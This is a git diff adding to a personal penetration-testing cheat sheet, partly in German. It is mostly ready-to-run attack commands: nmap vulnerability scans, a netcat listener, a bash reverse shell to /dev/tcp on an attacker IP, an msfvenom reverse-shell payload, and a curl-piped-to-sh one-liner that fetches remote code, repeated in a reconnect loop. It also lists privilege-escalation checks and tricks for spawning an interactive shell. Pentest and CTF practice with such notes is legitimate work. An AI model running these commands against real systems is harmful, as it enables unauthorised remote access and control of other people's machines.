diff --git a/Cheatsheet.md b/Cheatsheet.md index ebe2656..e541cda 100644 --- a/Cheatsheet.md +++ b/Cheatsheet.md @@ -26,70 +26,137 @@ to filter output for open ips ```bash nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt ``` -scan open ports + +scan open ports: ```bash nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155 ``` +#### bei windows +```bash +nmap --vuln ip +``` +##### bei windows \+ smb + +```bash +nmap --script vuln-smb* ip +nicht mehr sicher welches es war +nmap --script smb-vuln* ip +``` + +# inital access +### start listener: +```bash +rlwrap -cAr nc -nlvp 9002 +``` +### reverse shell bash: +```bash +/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1 +``` +### reverse shell file: +```bash +msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py +``` +-> from revshells.com + +### untested: + Reverse Shell as a Service + + 1. On your machine: +```bash + nc -l 1337 + or nlvp? +``` + + 2. On the target machine: +```bash + curl https://reverse-shell.sh/yourip:1337 | sh +``` +#### reconnecting: +```bash +while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done +``` +# privilege escalation - - - +### always run these: +```bash +sudo -l +``` +if sudo doesn't work: +[[#^78d3ce|spawn shell]] +#### check cronjobs +```bash +ls /etc/cron.* +crontab -l +``` ## TTY Spawn Shell -Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages. +##### if sudo still doesn't work +use +```bash +sudo -S command +``` +Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages. ### Python spawn shell +```bash python -c 'import pty; pty.spawn("/bin/bash")' - +``` Fully Interactive TTY - #### All the steps to stabilize your shell **The first step:** +```bash python3 -c 'import pty;pty.spawn("/bin/bash")' +``` Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys. - - **Step two is:** +```bash export TERM=xterm +``` This will give us access to term commands such as clear. - - **Finally (and most importantly) we will background the shell using** +```bash Ctrl + Z +``` Back in our own terminal we use +```bash stty raw -echo; fg +``` This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes +```bash stty rows 38 columns 116 - +``` ### OS system spawn shell +```bash echo os.system("/bin/bash") - +``` ### Bash spawn shell +```bash /bin/sh -i - +``` ### Perl spawn shell +```bash perl —e 'exec "/bin/sh";' - +``` ### Ruby spawn shell ruby: exec "/bin/sh" @@ -104,12 +171,30 @@ exec "/bin/sh" ### VI spawn shell +```bash :!bash - +``` ### VI(2) spawn shell +```bash :set shell=/bin/bash:shell - +``` ### Nmap spawn shell +```bash !sh +``` + +#### Exiftools + +Metadaten auslesen: + +```bash +exiftool picture.png +``` + +Binwalk (Binary Daten exportieren): + +```bash +binwalk -e picture.png +```